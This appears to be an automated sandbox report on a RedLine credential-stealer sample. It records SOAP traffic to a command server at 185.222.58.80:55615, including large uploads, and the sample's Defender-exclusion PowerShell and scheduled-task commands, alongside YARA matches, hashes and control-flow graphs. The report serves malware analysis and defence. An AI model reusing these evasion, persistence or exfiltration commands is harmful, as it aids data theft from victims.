                                                                              Oct 13, 2024 21:02:39.194298029 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194315910 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194333076 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194349051 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194365978 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194385052 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194401979 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194417953 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194434881 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194452047 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194468975 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194497108 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194514036 CEST5561549749185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:39.194530964 CEST5561549749185.222.58.80192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 21:02:23.790776014 CEST | 50909 | 53 | 192.168.2.4 | 1.1.1.1
Oct 13, 2024 21:02:34.132148981 CEST | 64418 | 53 | 192.168.2.4 | 1.1.1.1

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 21:02:23.790776014 CEST | 192.168.2.4 | 1.1.1.1 | 0x83d5 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:02:34.132148981 CEST | 192.168.2.4 | 1.1.1.1 | 0x4392 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 21:02:24.125950098 CEST | 1.1.1.1 | 192.168.2.4 | 0x83d5 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 13, 2024 21:02:34.139960051 CEST | 1.1.1.1 | 192.168.2.4 | 0x4392 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                              • 185.222.58.80:55615
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 185.222.58.80 | 55615 | 7204 | C:\Users\user\Desktop\PZNfhfaj9O.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 21:02:17.340723991 CEST | 240 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 137
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
Oct 13, 2024 21:02:18.026077032 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 13, 2024 21:02:18.195992947 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:18 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Oct 13, 2024 21:02:18.471203089 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:18 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Oct 13, 2024 21:02:23.295427084 CEST | 223 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 144
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
Oct 13, 2024 21:02:23.470098972 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 13, 2024 21:02:23.674642086 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 9183
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:23 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.138.49.165</b:string><b:string>116.23.16.120</b:string><b:string>122.239.112.123</b:string><b:string>113.101.58.220</b:string><b:string>172.174.62.166</b:string><b:string>113.111.39.109</b:string><b:string>123.161.218.204</b:string><b:string>125.91.190.66</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>113.128.50.41</b:string><b:string>119.250.241.28</b:string><b:string>175.8.165.91</b:string><b:string>106.117.49.4</b:string><b:string>113.117.61.95</b:string><b:string>1.192.39.26</b:string><b:string>125.94.3.228< [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49741 | 185.222.58.80 | 55615 | 7204 | C:\Users\user\Desktop\PZNfhfaj9O.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 21:02:27.293737888 CEST | 221 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930524
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
Oct 13, 2024 21:02:27.902607918 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 13, 2024 21:02:28.762758017 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 147
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:28 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 13, 2024 21:02:28.793237925 CEST | 217 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930516
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
Oct 13, 2024 21:02:28.973356962 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 13, 2024 21:02:29.657418013 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 261
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:29 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 185.222.58.80 | 55615 | 7728 | C:\Users\user\AppData\Roaming\CiENBY.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 21:02:27.787668943 CEST | 240 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 137
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
Oct 13, 2024 21:02:28.366475105 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:28 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Oct 13, 2024 21:02:33.495413065 CEST | 223 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 144
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
Oct 13, 2024 21:02:33.672224045 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 13, 2024 21:02:33.777941942 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 9183
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:33 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.138.49.165</b:string><b:string>116.23.16.120</b:string><b:string>122.239.112.123</b:string><b:string>113.101.58.220</b:string><b:string>172.174.62.166</b:string><b:string>113.111.39.109</b:string><b:string>123.161.218.204</b:string><b:string>125.91.190.66</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>113.128.50.41</b:string><b:string>119.250.241.28</b:string><b:string>175.8.165.91</b:string><b:string>106.117.49.4</b:string><b:string>113.117.61.95</b:string><b:string>1.192.39.26</b:string><b:string>125.94.3.228< [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49748 | 185.222.58.80 | 55615 | 7728 | C:\Users\user\AppData\Roaming\CiENBY.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 21:02:37.154263973 CEST | 221 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930112
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
Oct 13, 2024 21:02:38.705321074 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 147
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:38 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49749 | 185.222.58.80 | 55615 | 7728 | C:\Users\user\AppData\Roaming\CiENBY.exe

Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 21:02:38.713823080 CEST | 241 | OUT | POST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930104
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
Oct 13, 2024 21:02:40.140948057 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                              Content-Length: 261
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:40 GMT
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>



                                                                              Target ID:0
                                                                              Start time:15:02:07
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x9b0000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x480000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                                                                              Imagebase:0x480000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"
                                                                              Imagebase:0x960000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x3d0000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0xb10000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:15:02:15
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Imagebase:0xa60000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 61%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:15:02:16
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                              Imagebase:0x7ff693ab0000
                                                                              File size:496'640 bytes
                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:15:02:23
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                                                                              Imagebase:0x960000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:15:02:23
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:15:02:24
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\CiENBY.exe"
                                                                              Imagebase:0x450000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:15:02:24
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:10.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:220
                                                                                Total number of Limit Nodes:16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 526 2cdd448-2cdd4e7 GetCurrentProcess 530 2cdd4e9-2cdd4ef 526->530 531 2cdd4f0-2cdd524 GetCurrentThread 526->531 530->531 532 2cdd52d-2cdd561 GetCurrentProcess 531->532 533 2cdd526-2cdd52c 531->533 535 2cdd56a-2cdd585 call 2cdd627 532->535 536 2cdd563-2cdd569 532->536 533->532 539 2cdd58b-2cdd5ba GetCurrentThreadId 535->539 536->535 540 2cdd5bc-2cdd5c2 539->540 541 2cdd5c3-2cdd625 539->541 540->541
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD4D6
                                                                                • GetCurrentThread.KERNEL32 ref: 02CDD513
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD550
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02CDD5A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: baba2ae7296256e9ff26bb019da1632a1a9d5934f33995d531e92c9c9e70a95c
                                                                                • Instruction ID: 5b52ac41fce52b78205881d23d71fae3843242ae35bfdd099e4674d8813280cf
                                                                                • Opcode Fuzzy Hash: baba2ae7296256e9ff26bb019da1632a1a9d5934f33995d531e92c9c9e70a95c
                                                                                • Instruction Fuzzy Hash: 495187B0D00649CFDB54CFAAD548BDEBBF1EF88314F24849AE009A7360D7746944CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 548 2cdd458-2cdd4e7 GetCurrentProcess 552 2cdd4e9-2cdd4ef 548->552 553 2cdd4f0-2cdd524 GetCurrentThread 548->553 552->553 554 2cdd52d-2cdd561 GetCurrentProcess 553->554 555 2cdd526-2cdd52c 553->555 557 2cdd56a-2cdd585 call 2cdd627 554->557 558 2cdd563-2cdd569 554->558 555->554 561 2cdd58b-2cdd5ba GetCurrentThreadId 557->561 558->557 562 2cdd5bc-2cdd5c2 561->562 563 2cdd5c3-2cdd625 561->563 562->563
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD4D6
                                                                                • GetCurrentThread.KERNEL32 ref: 02CDD513
                                                                                • GetCurrentProcess.KERNEL32 ref: 02CDD550
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02CDD5A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 084d8ac13c3f02079db7faab92a51f08dd7c074320bf4b978baf897c3d1dcabf
                                                                                • Instruction ID: f1295805b2f51f8c27b486112815faea308438f1dd211609c91f56192835a7a6
                                                                                • Opcode Fuzzy Hash: 084d8ac13c3f02079db7faab92a51f08dd7c074320bf4b978baf897c3d1dcabf
                                                                                • Instruction Fuzzy Hash: D35164B0E00649CFDB54CFAAD948BDEBBF1EF88314F248459E019A7350DB74A984CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
